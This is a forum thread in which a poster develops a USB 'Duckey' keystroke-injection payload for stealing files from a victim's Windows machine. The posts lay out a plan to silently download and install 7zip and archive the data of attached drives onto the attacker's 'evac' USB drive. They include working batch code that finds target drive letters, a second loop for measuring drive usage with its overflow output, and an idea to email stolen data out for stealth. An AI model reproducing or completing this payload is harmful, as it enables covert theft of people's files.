[Payload] Starting work on a Duckey USB theft payload

[overwraith]

I am starting work on a Duckey USB file theft payload. The following codes will execute directly in the command prompt, and iterate through the possible drive letters, and ignore your "evac drive" (evac==evacuation) which will have a text file on the root evac.txt. The idea is to download 7zip, install it silently, then run the commands that will search out attached USB drives, and archive the files to your USB drive. The following is the code that will find the drives, and save them to a variable so we can send their locations to the 7zip application as arguments.

REM SET THE FLAG FOR ENABLE DELAYED ENVIRONMENT VARIABLE EXPANSION

REM FROM WHAT I UNDERSTAND THERE ARE INDIRECTION PROBLEMS WHEN NOT

REM SET AND THE VARIABLE IS CALLED MULTIPLE TIMES ON THE SAME LINE

cmd.exe /V:ON

REM IF SOME TEXT IS NOT ASSIGNED TO THIS VARIABLE THE LOOP WILL FAIL AND

REM CAUSE THE VARIABLE NAME TO BE ASSIGNED TO THE BEGINNING OF THE LIST

Set targetDr=*

REM THE FOR LOOP THAT SEEKS OUT SUITABLE DRIVES, HAS SOME NIFTY INDIRECTION

REM OPERATORS "!" WHICH ARE USED WHEN THE VARIABLE IS CALLED MULTIPLE

REM TIMES IN THE SAME LINE SO IT CAN TAKE ADVANTAGE OF THE ENABLED DELAYED

REM EXPANSION WE SET EARLIER

for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( IF NOT EXIST %a:\evac.txt If EXIST %a:\ SET targetDr=!targetDr! %a: )

REM REMOVE THE SINGLE CHARACTER OF TEXT WE ASSIGNED TO THE

REM LIST VARIABLE EARLIER

Set targetDr=%targetDr:~1%

REM SHOW ME THE OUTPUT

echo %targetDr%

The next great hurdle in this payload will be figuring out a way to determine the size of the attached drives, so we can tell whether or not it is a flash drive by its disk size. We don't want to end up trying to copy a hard drive to a flash drive that's not big enough.

If the "stealthyness" of this attack becomes a problem later, we can rely on something from the switchblade project to email the data to us.

[overwraith]

Started working on getting the used space on a drive, and I tried to make a "for" loop to do that too, and got some weird output. So for our resident bug hunters, does this look like a variable overflow situation?

cmd.exe /V:ON

Set /A usedSpace=0

for /R %i in (*) do Set /A usedSpace+=%~zi

Yields>

C:\>Set /A usedSpace+=8635

-1933490268

C:\>Set /A usedSpace+=5379

-1933484889

C:\>Set /A usedSpace+=22368

-1933462521

C:\>Set /A usedSpace+=2048

-1933460473

C:\>Set /A usedSpace+=844

-1933459629

C:\>Set /A usedSpace+=4726

-1933454903

C:\>Set /A usedSpace+=5182

-1933449721

C:\>Set /A usedSpace+=153298

-1933296423

C:\>Set /A usedSpace+=31

-1933296392

C:\>Set /A usedSpace+=1142784

-1932153608

C:\>Set /A usedSpace+=1630208

-1930523400

C:\>Set /A usedSpace+=540672

-1929982728

C:\>

[overwraith]

This is going to need approached from another language instead of batch. Mabe VBS, Python, or Powershell.